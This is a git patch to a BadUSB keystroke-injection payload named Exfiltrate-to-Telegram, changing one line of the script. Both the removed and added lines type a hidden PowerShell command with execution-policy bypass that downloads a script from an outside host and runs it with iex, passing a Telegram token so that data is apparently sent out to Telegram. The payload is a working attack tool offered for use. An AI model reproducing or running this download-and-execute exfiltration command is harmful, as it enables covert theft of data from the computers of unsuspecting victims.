From 9aa915250a7f2af220e87c9904f4d86478758f4c Mon Sep 17 00:00:00 2001 From: egieb <93350544+beigeworm@users.noreply.github.com> Date: Wed, 18 Jun 2025 15:08:13 +0000 Subject: [PATCH] Update Exfiltrate-to-Telegram.txt --- Exfiltrate-to-Telegram/Exfiltrate-to-Telegram.txt | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/Exfiltrate-to-Telegram/Exfiltrate-to-Telegram.txt b/Exfiltrate-to-Telegram/Exfiltrate-to-Telegram.txt index 9013f83..cad6217 100644 --- a/Exfiltrate-to-Telegram/Exfiltrate-to-Telegram.txt +++ b/Exfiltrate-to-Telegram/Exfiltrate-to-Telegram.txt @@ -14,6 +14,6 @@ REM open powershell (remove -W Hidden to show the window) DELAY 1000 GUI r DELAY 750 -STRING powershell -NoP -Ep Bypass -W H -C $tg='TELEGRAM_TOKEN'; irm https://bw0.cc/extg | iex +STRING powershell -Ep Bypass -W H -C $tg='TELEGRAM_TOKEN'; iex (irm bw0.cc/extg) ENTER